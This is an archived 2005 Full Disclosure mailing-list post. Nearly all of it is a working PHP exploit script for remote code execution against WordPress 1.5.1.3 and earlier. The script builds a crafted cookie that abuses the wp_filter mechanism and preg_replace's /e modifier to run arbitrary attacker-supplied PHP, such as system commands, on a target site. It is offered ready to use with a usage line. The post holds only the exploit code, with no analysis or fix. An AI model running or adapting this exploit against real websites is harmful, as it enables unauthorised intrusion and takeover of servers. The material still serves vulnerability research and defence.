Full Disclosure mailing list archives
(no subject)
From: <kartoffelguru () hush com>
Date: Tue, 9 Aug 2005 08:38:34 -0700
#!/usr/local/bin/php <?php echo "Wordpress <= 1.5.1.3 - remote code execution 0-DDAAYY exploit\n"; echo "(C) Copyright 2005 Kartoffelguru\n\n"; echo "[!] info: requires register_globals turned on on target host\n\n"; if (!extension_loaded('curl')) { die ("[-] you need the curl extension activated...\n"); } function usage() { die ("usage:\n\t./wpx.php -h http://www.xyz.net/blog/ -c 'system(\"uname -a;id\");'\n\n"); } $options = getopt("h:c:"); if (count($options) < 1 || !isset($options['h'])) { usage(); } $host = (is_array($options['h']) ? $options['h'][0]:$options['h']); $cmd = (is_array($options['c']) ? $options['c'][0]:$options['c']); if (!preg_match("/^http:\/\//", $host, $dummy)) { usage(); } if (strlen(trim($cmd))==0) { $cmd = 'phpinfo();'; } $code = base64_encode($cmd); $cnv = ""; for ($i=0;$i<strlen($code); $i++) { $cnv.= "chr(".ord($code[$i]).")."; } $cnv.="chr(32)"; $str = base64_encode('args[0]=eval(base64_decode('.$cnv.')).die()&args[1]=x '); $cookie='wp_filter[query_vars][0][0][function]=get_lastpostdate;wp_f ilter[query_vars][0][0][accepted_args]=0;'; $cookie.='wp_filter[query_vars][0][1][function]=base64_decode;wp_fil ter[query_vars][0][1][accepted_args]=1;'; $cookie.='cache_lastpostmodified[server]=//e;cache_lastpostdate[serv er]='; $cookie.=$str; $cookie.=';wp_filter[query_vars][1][0][function]=parse_str;wp_filter [query_vars][1][0][accepted_args]=1;'; $cookie.='wp_filter[query_vars][2][0][function]=get_lastpostmodified ;wp_filter[query_vars][2][0][accepted_args]=0;'; $cookie.='wp_filter[query_vars][3][0][function]=preg_replace;wp_filt er[query_vars][3][0][accepted_args]=3;'; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $host); curl_setopt($ch, CURLOPT_POST, 0); curl_setopt($ch, CURLOPT_COOKIE, $cookie); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_CURLOPT_REFERER, $host); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"); curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0); echo "[+] now executing\n\n"; $r = curl_exec($ch); curl_close($ch); echo $r; ?> Concerned about your privacy? Follow this link to get secure FREE email: http://www.hushmail.com/?l=2 Free, ultra-private instant messaging with Hush Messenger http://www.hushmail.com/services-messenger?l=434 Promote security and make money with the Hushmail Affiliate Program: http://www.hushmail.com/about-affiliate?l=427 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- (no subject) kartoffelguru (Aug 09)
- <Possible follow-ups>
- (no subject) kartoffelguru (Aug 09)
- Re: (no subject) KF (lists) (Aug 09)
- Re: (no subject) Stan Bubrouski (Aug 09)
- Re: (no subject) KF (lists) (Aug 09)
- (no subject) J. Oquendo (Aug 14)
- (no subject) Donato Ferrante (Aug 24)